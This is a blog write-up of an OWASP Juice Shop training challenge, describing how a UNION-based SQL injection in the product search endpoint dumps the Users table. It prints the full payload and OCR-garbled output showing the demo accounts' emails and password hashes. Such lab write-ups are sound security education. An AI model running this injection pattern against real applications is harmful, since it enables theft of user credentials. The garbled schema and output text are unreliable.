Hacking OWASP’s Juice Shop Pt 46: User Credentials

Challenge: 

Name: User Credentials

Description: Retrieve a list of all user credentials via SQL Injection.

Difficulty: 4 star

Category: Injection

Expanded Description: https://pwning.owasp-juice.shop/part2/injection.html

Tools used:

None.

Resources used:

Database Schema

Methodology: 

In the expanded description for this challenge it is made fairly obvious that this challenge will be very similar to the Database Schema challenge, for which a special SQL injection payload had to be crafted. As this time around the target is only the user credential table, it’s handy to have an idea of what the table entries  look like. To gather that information, you can either complete the Database Schema or Administration Section challenges. The Admin Section challenge requires a few additional steps in terms of using the browser’s developer tools to track down the authentication-details.json file. The end result, however, is that the below set of information is what the database tracks about each user.

"createdAt": " 
"deletedAt" : 
nun, 
"deluxeToken" . 
"email": "benderö)juice-sh .op" , 
"id": 
"isActive" : 
true, 
"lastLoginIp" : 
"0.0.0.0" , 
"password • " 
"assets/ public/images/uploads/default.svg" 
"profilelmage" : 
"role": "customer" 
"totpSecret": " " , 
"updatedAt": " 
"username" :

Knowing this, it’s just a matter of crafting an SQL query and utilizing the injection syntax (“q=word’)) … query … –“) we used in the Database Schema challenge on the same vulnerable url. Knowing from the Database Schema challenge that the query we craft must seek nine data columns from the User table, and also that there are more than nine columns in that particular table, the query we’ll use to complete this challenge is somewhat customizable in terms of what data you’re looking to extract from the database. In my case, I chose ID, email, password, role, isActive, username, createdAt, deletedAt, and totpSecret. My query was “none’)) UNION SELECT  id, email, password, role, isActive, username, createdAt, deletedAt, totpSecret FROM Users–“. I then added that query string to the /rest/products/search?q= url and hit enter.

G) localhost:3000/rest/products/search?q=none')) UNIC 
Kali Training 
JSON Raw Data 
Kali Tools 
Headers 
Save Copy Collapse All Expand All 
NetHunter 
Exploit-DB 
GHDB MSFU 
Filter JsaN 
status : 
data: 
nane : 
description: 
price: 
deluxePrice: 
Image: 
createdAt: 
updatedAt : 
deletedAt: 
nane : 
description: 
price: 
deluxePrice: 
Image: 
createdAt: 
updatedAt : 
deletedAt : 
nane : 
description: 
price: 
deluxePrice: 
Image: 
createdAt: 
updatedAt : 
deletedAt: 
"success" 
"admin@juice-sh.op" 
"0192323a7bbd7325e516fB69df18b5dO" 
"admin" 
"2e2e-11-11 
"jim@j sh . op 
"e541ca7ecf72b8d1286474fc613ese45" 
"customer" 
"2e2e-11-11 
"bender@j ulce- sh . op" 
"Oc36e517e3fa95aabf1bbffc6744a4ef" 
"customer" 
"2e2e-11-11
You successfully solved a challenge: User Credentials (Retrieve a list of all user credentials via SQL Injection.) 
x

Prevention and Mitigation Strategies:

OWASP Mitigation Cheat Sheet

Lessons Learned and Things Worth Mentioning: 

I’m slowly getting better at SQL queries. Despite earning an A in my Databases class, and having planned, diagrammed, and implemented a MySQL database using PHP, injection attacks felt awkward for a long time. It’s nice to see that progress.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s